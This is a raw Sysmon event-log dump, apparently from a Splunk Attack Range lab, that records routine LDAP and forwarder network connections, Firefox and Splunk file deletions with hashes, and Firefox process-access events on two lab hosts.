21:46:11.578{54715871-FD14-60C9-0100-00000000CF01}4SystemNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:5903:b2a9:cf82:36c4win-dc-681.attackrange.local55418-truefe80:0:0:0:5903:b2a9:cf82:36c4win-dc-681.attackrange.local445microsoft-ds 354300x8000000000000000104939Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:46:11.472{54715871-FD16-60C9-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.14win-dc-681.attackrange.local55417-false10.0.1.14win-dc-681.attackrange.local389ldap 354300x8000000000000000104938Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:46:11.472{54715871-FD18-60C9-1600-00000000CF01}1292C:\Windows\System32\svchost.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-681.attackrange.local55417-false10.0.1.14win-dc-681.attackrange.local389ldap 354300x8000000000000000104937Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:46:11.465{54715871-FD16-60C9-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:5903:b2a9:cf82:36c4win-dc-681.attackrange.local55416-truefe80:0:0:0:5903:b2a9:cf82:36c4win-dc-681.attackrange.local389ldap 354300x8000000000000000104936Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:46:11.465{54715871-FD18-60C9-1600-00000000CF01}1292C:\Windows\System32\svchost.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:5903:b2a9:cf82:36c4win-dc-681.attackrange.local55416-truefe80:0:0:0:5903:b2a9:cf82:36c4win-dc-681.attackrange.local389ldap 354300x8000000000000000151454Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:11.857{39BD8DE3-4818-60CA-2408-00000000D101}4064C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-14.attackrange.local58402-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x8000000000000000151453Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:13.371{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=76BC11784BABC26BA5C9A3228048261D,SHA256=C8E15E2980FE9A9395F36E87B5064359296281903B6F1C10A16847645609725B,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000104943Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:46:12.709{54715871-FD33-60C9-6D00-00000000CF01}3756C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-681.attackrange.local55419-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x8000000000000000151458Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:14.821{39BD8DE3-131D-60CA-0B01-00000000D101}1192WIN-HOST-14\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\rk0lnaq8.default-release\permissions.sqlite-journalMD5=CFD8DCBA1B54882A953930D2CCF4FF07,SHA256=600950BCE6D6D1C5FD1A511275EC013A8BB4E9E75311CFDACC3648EC56B364B3,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000151457Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:14.736{39BD8DE3-131D-60CA-0B01-00000000D101}11921152C:\Program Files\Mozilla Firefox\firefox.exe{39BD8DE3-131F-60CA-0D01-00000000D101}2148C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+3ecf51|C:\Program Files\Mozilla Firefox\xul.dll+16a060f|C:\Program Files\Mozilla Firefox\xul.dll+68a670|C:\Program Files\Mozilla Firefox\xul.dll+179b3f2|C:\Program Files\Mozilla Firefox\xul.dll+179b324|C:\Program Files\Mozilla Firefox\xul.dll+6878f8|C:\Program Files\Mozilla Firefox\xul.dll+1797c17|C:\Program Files\Mozilla Firefox\xul.dll+17a1ea8|C:\Program Files\Mozilla Firefox\xul.dll+17a1ea8|C:\Program Files\Mozilla Firefox\xul.dll+1795f16|C:\Program Files\Mozilla Firefox\xul.dll+17963f3|C:\Program Files\Mozilla Firefox\xul.dll+2ff7916|C:\Program Files\Mozilla Firefox\xul.dll+64a53d|C:\Program Files\Mozilla Firefox\xul.dll+640992|C:\Program Files\Mozilla Firefox\xul.dll+2bbbae1|C:\Program Files\Mozilla Firefox\xul.dll+2bbad50|C:\Program Files\Mozilla Firefox\xul.dll+61e011|C:\Program Files\Mozilla Firefox\xul.dll+2d7a6fa|C:\Program Files\Mozilla Firefox\xul.dll+2d7f900|C:\Program Files\Mozilla Firefox\xul.dll+2d7f775|C:\Program Files\Mozilla Firefox\xul.dll+2d7f2f7|C:\Program Files\Mozilla Firefox\xul.dll+2d7edba 10341000x8000000000000000151456Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:14.736{39BD8DE3-131D-60CA-0B01-00000000D101}11921152C:\Program Files\Mozilla Firefox\firefox.exe{39BD8DE3-131F-60CA-0D01-00000000D101}2148C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+3ecf51|C:\Program Files\Mozilla Firefox\xul.dll+1203781|C:\Program Files\Mozilla Firefox\xul.dll+1234ce9|C:\Program Files\Mozilla Firefox\xul.dll+1234c09|C:\Program Files\Mozilla Firefox\xul.dll+12323e0|C:\Program Files\Mozilla Firefox\xul.dll+12328f4|C:\Program Files\Mozilla Firefox\xul.dll+16ba421|C:\Program Files\Mozilla Firefox\xul.dll+689569|C:\Program Files\Mozilla Firefox\xul.dll+689474|C:\Program Files\Mozilla Firefox\xul.dll+68925d|C:\Program Files\Mozilla Firefox\xul.dll+688e64|C:\Program Files\Mozilla Firefox\xul.dll+179b3d3|C:\Program Files\Mozilla Firefox\xul.dll+179b324|C:\Program Files\Mozilla Firefox\xul.dll+6878f8|C:\Program Files\Mozilla Firefox\xul.dll+1797c17|C:\Program Files\Mozilla Firefox\xul.dll+17a1ea8|C:\Program Files\Mozilla Firefox\xul.dll+17a1ea8|C:\Program Files\Mozilla Firefox\xul.dll+1795f16|C:\Program Files\Mozilla Firefox\xul.dll+17963f3|C:\Program Files\Mozilla Firefox\xul.dll+2ff7916|C:\Program Files\Mozilla Firefox\xul.dll+64a53d|C:\Program Files\Mozilla Firefox\xul.dll+640992 23542300x8000000000000000151455Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:14.390{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=83E038C04D823B68059B93020F1BA6D4,SHA256=13011088578BBB859E4D8ED4967CDB8A88F5E560C5AF432EAC894BDBA4873C8F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104945Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:46:15.764{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F8B34B1F19E568819311FEAF78802DE9,SHA256=433FEACE3D76A18BD764B49CADB016FCD2A2C2C9202DA1607B04A60D1FA11D01,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104944Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:46:15.086{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AD3DDF94553E0D9FDB306F33AA68A607,SHA256=80EBC1475B340EF1F8113D977A3B04412C2D5E5710F6170D25F9EDAD23360090,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000151461Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:15.952{39BD8DE3-131D-60CA-0B01-00000000D101}1192WIN-HOST-14\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\rk0lnaq8.default-release\safebrowsing-updating\google4\goog-phish-proto-1.vlpsetMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000151460Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:15.688{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=6890D0FAE8253BEE1359FF30A4D88F41,SHA256=0284C496FFACC67DC0B273AB6FD635B2005B5AF65AB06C621266421969FD77FE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000151459Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:15.404{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=67CC61EA8AF60E8A51E477C110ED4BA5,SHA256=1C5BB7AF55C8366B8AEF3704BC84D803027CF1720ACD2854C39C8D9AC7428ED3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000151512Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:16.901{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D663793A3AC686AE748C7268D8FD2616,SHA256=936550FC55B5DC5365528EB610C93E6E22E1616E8D76197C758806FFB76A51E5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000151511Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:16.720{39BD8DE3-131D-60CA-0B01-00000000D101}1192WIN-HOST-14\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\rk0lnaq8.default-release\prefs-1.jsMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000151510Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:16.221{39BD8DE3-131D-60CA-0B01-00000000D101}1192WIN-HOST-14\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\rk0lnaq8.default-release\safebrowsing-updating\social-tracking-protection-twitter-digest256.vlpsetMD5=4389884605AD56EC50BF27FBD4CFB473,SHA256=60B552CBA048738FE850BA958CDDF9B742B6FAA7519F455D4B39437734725990,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000151509Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:16.221{39BD8DE3-131D-60CA-0B01-00000000D101}1192WIN-HOST-14\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\rk0lnaq8.default-release\safebrowsing-updating\social-tracking-protection-twitter-digest256.sbstoreMD5=3F92B621E1581AD764BE2EC57381AF23,SHA256=18FBBA6D350213F61DF718195FD2B38A3B8344D0A5C22C2713E6F8944E9A9DD4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000151508Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:16.221{39BD8DE3-131D-60CA-0B01-00000000D101}1192WIN-HOST-14\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\rk0lnaq8.default-release\safebrowsing-updating\social-tracking-protection-linkedin-digest256.vlpsetMD5=8D76E0D31A687AE5A730C71C052C68E8,SHA256=6747A2FB92023CBF27E345AAC38B2BA7695A7DC5E9A42BD793D0CF6DAEAED260,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000151507Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:16.205{39BD8DE3-131D-60CA-0B01-00000000D101}1192WIN-HOST-14\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\rk0lnaq8.default-release\safebrowsing-updating\social-tracking-protection-linkedin-digest256.sbstoreMD5=DC7308A91A03C92D7329F37F15C7AC82,SHA256=180DDE904FFF036ABD4045A52850200ACA369E4577E14E0675E5298855A6AA0C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000151506Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:16.205{39BD8DE3-131D-60CA-0B01-00000000D101}1192WIN-HOST-14\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\rk0lnaq8.default-release\safebrowsing-updating\social-tracking-protection-facebook-digest256.vlpsetMD5=54971F1ADD787A9676F9DEFAB4C7FE3F,SHA256=FD890E3920CDFB62C1089C6119A8F8B713F81BDDAF7BEC925AFB4BDFB32AF5E6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000151505Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:16.205{39BD8DE3-131D-60CA-0B01-00000000D101}1192WIN-HOST-14\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\rk0lnaq8.default-release\safebrowsing-updating\social-tracking-protection-facebook-digest256.sbstoreMD5=0A19E4A237D65FF069452EF5201F217E,SHA256=AC5D43328F28E2B1159D014197F58D987C2AB78C9179DCD924524353571FA604,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000151504Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:16.205{39BD8DE3-131D-60CA-0B01-00000000D101}1192WIN-HOST-14\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\rk0lnaq8.default-release\safebrowsing-updating\social-track-digest256.vlpsetMD5=D95F203FEE1C8FAE222EF4C6D410971B,SHA256=1CA57763647104AEF83C8A86E8366FBBEE4BAA88C900C7AF66F437720319CEAB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000151503Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:16.205{39BD8DE3-131D-60CA-0B01-00000000D101}1192WIN-HOST-14\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\rk0lnaq8.default-release\safebrowsing-updating\social-track-digest256.sbstoreMD5=C0FE3CB314FDF424A4D4F1DE2801A4DF,SHA256=C4CA8CE5B3B8D038E3348887BDA7634D1949325BB95A68D17184D2A99F37E810,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000151502Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:16.205{39BD8DE3-131D-60CA-0B01-00000000D101}1192WIN-HOST-14\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\rk0lnaq8.default-release\safebrowsing-updating\mozstd-trackwhite-digest256.vlpsetMD5=8F1AF05E946BCD9711A1CDE1B1ED6C95,SHA256=0F5C8864E17307F3C8CE1D35AC4770D0C1C34F8CDB3FC7404F2114B4E0FD93BF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000151501Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:16.205{39BD8DE3-131D-60CA-0B01-00000000D101}1192WIN-HOST-14\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\rk0lnaq8.default-release\safebrowsing-updating\mozstd-trackwhite-digest256.sbstoreMD5=B91E9842F81EE5668B68C0B5B561010A,SHA256=19F7DFB5FC8E587C8D48DC8A779B07E1C11CCD772A7B68025146FF0A335B54CB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000151500Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:16.205{39BD8DE3-131D-60CA-0B01-00000000D101}1192WIN-HOST-14\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\rk0lnaq8.default-release\safebrowsing-updating\mozplugin-block-digest256.vlpsetMD5=FCC9C2C9B611A3264B68EBE180EB4248,SHA256=6ECD378A537EEFE350B45CFA353741383F407D99D776BF23155A7825DC5DD2BC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000151499Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:16.205{39BD8DE3-131D-60CA-0B01-00000000D101}1192WIN-HOST-14\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\rk0lnaq8.default-release\safebrowsing-updating\mozplugin-block-digest256.sbstoreMD5=519BEB1B01FC355BB388F1F75BE997FD,SHA256=FFE2D3077B81AE6F51B220C1C661B276C823FA67DAD1D64FC5F17249FC54BDC0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000151498Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:16.205{39BD8DE3-131D-60CA-0B01-00000000D101}1192WIN-HOST-14\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\rk0lnaq8.default-release\safebrowsing-updating\google4\goog-unwanted-proto.vlpsetMD5=6D13FF9F1DE62CE85D12EDE6DC0B9ED4,SHA256=648A91DFA68F658298EA8E703272BC6F463DD3AC68C5149E5AD6F693AA9D788F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000151497Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:16.205{39BD8DE3-131D-60CA-0B01-00000000D101}1192WIN-HOST-14\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\rk0lnaq8.default-release\safebrowsing-updating\google4\goog-unwanted-proto.metadataMD5=2A2F71F883E7E5D1C4A3BCF30BAB229B,SHA256=B9ECDE7C2CA20616B31AA351A9F560C54B77985971B3D46F21F8E654145BA6EB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000151496Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:16.205{39BD8DE3-131D-60CA-0B01-00000000D101}1192WIN-HOST-14\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\rk0lnaq8.default-release\safebrowsing-updating\google4\goog-phish-proto.vlpsetMD5=B388295349CECF9A2A1838A8CB41C05D,SHA256=779C27B81CBA0286DF94F176716F9AF112650C90D76E8943268AB52FD1034DB8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000151495Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:16.136{39BD8DE3-131D-60CA-0B01-00000000D101}1192WIN-HOST-14\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\rk0lnaq8.default-release\safebrowsing-updating\google4\goog-phish-proto.metadataMD5=87832ABD850B359BA1F21BC561ED3388,SHA256=0407A505501B1923E897AFAF9A63BAC9F95366B9ED87AAA141F58CE8163547B5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000151494Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:16.136{39BD8DE3-131D-60CA-0B01-00000000D101}1192WIN-HOST-14\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\rk0lnaq8.default-release\safebrowsing-updating\google4\goog-malware-proto.vlpsetMD5=C3598875FAAE8A7D6AB60E9F8921CDB6,SHA256=5860157B1B9BFE2A45E99F68F8CC715F6CEE3D71A7EB2BA2B7685DAF1ACFBA80,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000151493Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:16.136{39BD8DE3-131D-60CA-0B01-00000000D101}1192WIN-HOST-14\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\rk0lnaq8.default-release\safebrowsing-updating\google4\goog-malware-proto.metadataMD5=28ECA11AF3FCA7FE06065A92D0B9F1EE,SHA256=91AD86AB50FCBF804E6033FD43A258AF29321DEC5875DD1958CA9A3EBA193621,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000151492Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:16.136{39BD8DE3-131D-60CA-0B01-00000000D101}1192WIN-HOST-14\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\rk0lnaq8.default-release\safebrowsing-updating\google4\goog-downloadwhite-proto.vlpsetMD5=EA86E0097B81FDBDEE3F12AC90CA6410,SHA256=6A242B62530E38DDCFD272643F6CC44EDC0208C69DC3022D6CC273F4C7E79AF8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000151491Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:16.136{39BD8DE3-131D-60CA-0B01-00000000D101}1192WIN-HOST-14\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\rk0lnaq8.default-release\safebrowsing-updating\google4\goog-downloadwhite-proto.metadataMD5=8DC78A562E1B268958A981D0AD7EAD74,SHA256=2A960282D759EAE224A8A47ABAD7A54DF042460DF0E5AC83A793FA822615FB83,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000151490Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:16.136{39BD8DE3-131D-60CA-0B01-00000000D101}1192WIN-HOST-14\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\rk0lnaq8.default-release\safebrowsing-updating\google4\goog-badbinurl-proto.vlpsetMD5=732E1CF2EC86EFBE72847CAC314577C8,SHA256=0BDC5215B25086C57601BE03FFB04F32785FA10D74BFE83042080BDAFD28A15D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000151489Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:16.120{39BD8DE3-131D-60CA-0B01-00000000D101}1192WIN-HOST-14\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\rk0lnaq8.default-release\safebrowsing-updating\google4\goog-badbinurl-proto.metadataMD5=0A6DA5B03C8CFE4F3D179E7B46DCB6FE,SHA256=611912EE59BDD09CC3CCEC08D4CFA703A0C7781862055115394E3F9BE0B93F83,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000151488Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:16.120{39BD8DE3-131D-60CA-0B01-00000000D101}1192WIN-HOST-14\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\rk0lnaq8.default-release\safebrowsing-updating\google-trackwhite-digest256.vlpsetMD5=E54E5B84194EEE15E64D2A03F1136BB7,SHA256=07707B589BE3DBA3BB0BDAC67760A2B180EA3531E9D7976B73E4C1D8DF9DBB1E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000151487Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:16.120{39BD8DE3-131D-60CA-0B01-00000000D101}1192WIN-HOST-14\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\rk0lnaq8.default-release\safebrowsing-updating\google-trackwhite-digest256.sbstoreMD5=5A35E65CADA1885B6796D1B3FE56E5F8,SHA256=35A1BF0FF6DD2B70DA5F89611891D413808DDE1510D03D788FF48A214AFA7CDD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000151486Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:16.105{39BD8DE3-131D-60CA-0B01-00000000D101}1192WIN-HOST-14\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\rk0lnaq8.default-release\safebrowsing-updating\except-flashsubdoc-digest256.vlpsetMD5=0C0D67875BD75A0227C02DD8529BA01A,SHA256=614BE0169EC36E67223EB9645A98DA66DBFDE5DFBB89BB064F428AAEABDD9D97,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000151485Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:16.105{39BD8DE3-131D-60CA-0B01-00000000D101}1192WIN-HOST-14\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\rk0lnaq8.default-release\safebrowsing-updating\except-flashsubdoc-digest256.sbstoreMD5=22698B4CF784DBBAE2D583F00491D43D,SHA256=3849563088AE0677D61702A1310FDE26DE5DDD846D53037222D3EFE012197BF5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000151484Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:16.105{39BD8DE3-131D-60CA-0B01-00000000D101}1192WIN-HOST-14\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\rk0lnaq8.default-release\safebrowsing-updating\except-flashallow-digest256.vlpsetMD5=7194B6BFF691A056852A51E2E06CE8FE,SHA256=CBE2DC6ABFE25BEAD60F4DFAF419FC0F441FF8A8DD4A2FEBF5553BE1CBD90C49,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000151483Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:16.105{39BD8DE3-131D-60CA-0B01-00000000D101}1192WIN-HOST-14\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\rk0lnaq8.default-release\safebrowsing-updating\except-flashallow-digest256.sbstoreMD5=DD0458514C9A922B45DA6A8BEBE47320,SHA256=D27D5B27030F4725249377951BEB89E84A90A0E8241F0D5FD80EA59C1606E761,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000151482Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:16.105{39BD8DE3-131D-60CA-0B01-00000000D101}1192WIN-HOST-14\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\rk0lnaq8.default-release\safebrowsing-updating\except-flash-digest256.vlpsetMD5=C2994D388F8780C87D35C352D9582985,SHA256=7ED09F7D2BD632F70077A4AE4F2BD2F3FB654B03CD72652F51678B0C7D027F25,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000151481Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:16.105{39BD8DE3-131D-60CA-0B01-00000000D101}1192WIN-HOST-14\AdministratorC:\Program Files\Mozilla 